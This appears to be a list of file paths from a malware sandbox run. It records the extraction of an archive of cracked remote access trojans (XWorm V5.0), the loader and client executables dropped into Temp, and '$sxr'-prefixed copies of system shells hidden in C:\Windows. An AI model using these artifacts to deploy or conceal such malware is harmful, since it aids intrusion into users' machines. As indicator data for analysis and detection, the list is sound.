C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

C:\Windows\$sxr-powershell.exe

C:\Windows\$sxr-mshta.exe

\??\PIPE\srvsvc

C:\Windows\$sxr-cmd.exe

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\Admin\Desktop\all-cracked-rats-main.zip

C:\Users\Admin\Desktop\all-cracked-rats-main\XWorm V5.0\Icons\icon (15).ico

C:\Users\Admin\Desktop\all-cracked-rats-main\XWorm V5.0\crack.exe

C:\Users\Admin\Desktop\all-cracked-rats-main\XWorm V5.0\XWormLoader.exe

C:\Users\Admin\AppData\Local\Temp\XWormLoader.exe

C:\Users\Admin\AppData\Local\Temp\Client.exe

C:\Users\Admin\Desktop\all-cracked-rats-main\XWorm V5.0\XWorm V5.0.exe

C:\Users\Admin\AppData\Local\Temp\XWorm V5.0.exe

C:\Users\Admin\AppData\Local\Temp\CE8806DA1EF0F1BB553DFF4FC5E9FCCD\CE8806DA1EF0F1BB553DFF4FC5E9FCCD.dll
